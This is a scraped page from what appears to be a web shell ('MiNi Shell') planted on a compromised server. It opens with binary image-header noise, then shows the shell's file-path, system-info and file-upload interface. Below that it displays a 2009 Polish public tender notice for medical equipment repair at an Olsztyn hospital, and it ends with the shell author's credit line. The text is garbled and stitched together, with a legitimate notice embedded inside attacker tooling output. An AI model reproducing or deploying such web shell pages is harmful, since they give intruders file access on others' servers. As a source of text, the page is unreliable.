JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090807/129247-N-2009.html

<p class="kh_header"><b>Olsztyn: Usługi w zakresie napraw i konserwacji sprzętu medycznego</b><br>
<b>Numer ogłoszenia: 129247 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc , ul. Jagiellońska 78, 10-357 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5322966, faks 089 5322979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pulmonologia.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie napraw i konserwacji sprzętu medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania są usługi w zakresie napraw i konserwacji sprzętu medycznego szczegółowo określonego w Formularzu cenowym stanowiącym Załącznik Nr 3 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2.   Usługi, o których mowa w pkt 1, obejmują: 
a) przeglądy  okresowe, mające na celu sprawdzenie sprawności sprzętu, dokonanie ewentualnej regulacji parametrów technicznych, konserwację i czyszczenie, zarówno sprzętu jak                         i przewodów do niego podłączonych, stanowiących z nim integralną część oraz pozostałe czynności wymienione w instrukcjach technicznych producenta danego sprzętu, a także  dojazd Wykonawcy. Zakres prac winien obejmować także czynności wymienione w instrukcjach technicznych producenta danego sprzętu.
  b) usługi naprawy sprzętu medycznego wyszczególnionego w niniejszej SIWZ.
3.  Usługi określone w pkt 2 mają na celu podtrzymanie stałej gotowości eksploatacyjnej sprzętu określonego w SIWZ.
4.  Usługi określone w pkt 2, Wykonawca będzie realizował przez odpowiednio przeszkolonych  pracowników, przy użyciu własnej aparatury kontrolno-pomiarowej, narzędzi oraz materiałów. 
5.   Naprawy urządzeń będą odbywały się po  telefonicznym lub pisemnym (faxem) zgłoszeniu przez Zamawiającego o zaistniałej awarii, w ciągu 48 godzin od zgłoszenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zgodnie z art. 45 ust. 2 ustawy Zamawiający nie wymaga  wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy:

1.   Nie podlegają  wykluczeniu  na podstawie art. 24 Ustawy.
2.   Spełniają warunki zawarte w art. 22 ust. 1, tj.:
   a) posiadają uprawnienia do wykonywania określonej działalności, jeżeli ustawy  nakładają  obowiązek posiadania takich uprawnień, 
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                       i osobami   zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
   c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
   d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
3.   Złożą oświadczenie (Załącznik Nr 2 do SIWZ), że:
   a) Wykonawca zapoznał się z treścią  SIWZ i przyjmuje ją bez zastrzeżeń oraz, że  otrzymał   wszystkie    konieczne informacje potrzebne do przygotowania oferty,
b) w przypadku wyboru oferty podpisze umowę,  której projekt  załączono do specyfikacji istotnych   warunków  zamówienia  w terminie i w czasie wskazanym przez Zamawiającego, 
c) nie zachodzi żadna okoliczność powodująca wykluczenie Wykonawcy z postępowania                       o  udzielenie zamówienia na podstawie art. 24 Ustawy,
d) posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami    zdolnymi   do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
 e) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
5.  W przypadku, o którym mowa w ust. 4, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich  w postępowaniu o udzielenie  zamówienia albo reprezentowania                        w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zwanego dalej Liderem Konsorcjum. Przepisy dotyczące  Wykonawcy stosuje się odpowiednio do Lidera Konsorcjum. 
6.  Zamawiający żąda, aby Wykonawca wskazał w ofercie część zamówienia  (czynności), jaką zamierza powierzyć podwykonawcom. Zgodnie z art. 474 Kodeksu cywilnego odpowiedzialność za należyte wykonanie umowy, także w zakresie powierzonym podwykonawcom, ciąży na Wykonawcy.
7.    Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie dokumentów    i oświadczeń jakich żąda od Wykonawców w  Rozdziale V SIWZ, stosując formułę spełnia - nie spełnia  wypełniając druk ZP - 14..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz ofertowy - Załącznik Nr  1.
2.	Aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej  prawo do reprezentowania Wykonawcy  w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
3.	Wskazanie osoby upoważnionej do podpisania umowy (w przypadku wyłonienia Wykonawcy                      w niniejszym postępowaniu) oraz jej aktualne pełnomocnictwo, o ile jej prawo do reprezentowania Wykonawcy  w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.   Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego wystawione nie wcześniej niż                  3 miesiące przed upływem terminu składania ofert, potwierdzające, że  Wykonawca nie zalega                            z opłacaniem podatków, opłat.
6. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne.
7.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w ust.  4, 5, 6,   składa dokument  lub dokumenty, wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)   nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)   nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)    nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
d)  oraz zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy.  
8.  Oświadczenie o spełnianiu warunków wymaganych przez Zamawiającego - Załącznik Nr 2.  
9. Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania  koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem.
10. W celu potwierdzenia, posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda wykazu wykonanych usług w zakresie napraw i konserwacji sprzętu medycznego (co najmniej trzy umowy naprawy i konserwacji sprzętu medycznego obejmujące swym zakresem min. 50% pozycji z zadania, na które Wykonawca składa ofertę), w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem                     i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że ta usługa została wykonana należycie (np. referencje)  - Załącznik Nr 6.
11. Oświadczenie Wykonawcy, iż do wykonania przedmiotowego zamówienia posiada wymaganą wiedzę techniczną i uprawnienia (na potwierdzenie należy dołączyć zaświadczenia o przebytych szkoleniach, kursach, uzyskane certyfikaty itp.). 
12. W przypadku Zadania Nr 6, Zamawiający wymaga dołączenia do oferty zaświadczenia producenta sprzętu określonego w tym zadaniu (Becton Dickinson), potwierdzającego uprawnienia do wykonywania usług w zakresie napraw i konserwacji Bactec MGIT oraz BD Probetec.

13. W przypadku Zadania Nr 10, Zamawiający wymaga aby Wykonawca udokumentował wiedzę             z zakresu aplikacji (wykonywanie oznaczeń PT, APTT, stężenia Fibrynogenu przy użyciu odczynników firmy Bio-Ksel Sp. z o.o.
14.  Zaakceptowany (podpisany) projekt umowy - Załącznik Nr 4 i/lub 5.
   15. Wymagane dokumenty w przypadku składania oferty przez podmioty działające wspólnie na  podstawie  zawartej na piśmie umowy: 
15.1 Oferta składana przez dwa lub kilka podmiotów, które występują wspólnie - konsorcja (tj. osoby fizyczne, osoby prawne oraz jednostki organizacyjne nie posiadające osobowości prawnej) musi spełniać następujące wymagania:
a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego a takie pełnomocnictwo musi być podpisane przez osoby upoważnione do reprezentowania wszystkich Wykonawców.
b) Każdy z uczestników Konsorcjum dołączy do oferty oświadczenie, że w przypadku wygrania przetargu, będzie ponosił solidarną odpowiedzialność wobec Zamawiającego na etapie realizacji zamówienia jak i z tytułu udzielonych gwarancji i rękojmi.
15.2.  Każdy z wykonawców musi oddzielnie złożyć dokumenty i oświadczenia zawarte w Rozdziale V ust. 2, ust. 4-9. Pozostałe dokumenty mające na celu potwierdzenie spełnienia wymogów  SIWZ oferenci złożą wspólnie.
15.3.  Oferta składana przez spółkę cywilną musi zawierać:
a)    umowę spółki,
b)    wszystkie dokumenty wymienione w SIWZ,
c)   każdy ze wspólników musi oddzielnie złożyć oświadczenie, o którym mowa w Rozdziale   IV ust. 3  i w Rozdziale V ust. 8.
15.4. W przypadku oferty składanej przez spółkę z o.o., gdy wartość zamówienia przekracza podwójną wysokość  kapitału zakładowego, zarząd spółki powinien być upoważniony uchwałą zgromadzenia wspólników do zawierania umowy (art. 230 Kodeksu Spółek  Handlowych)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pulmonologia.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Budynek administracji, pok. 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2009 godzina 10:45, miejsce: Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com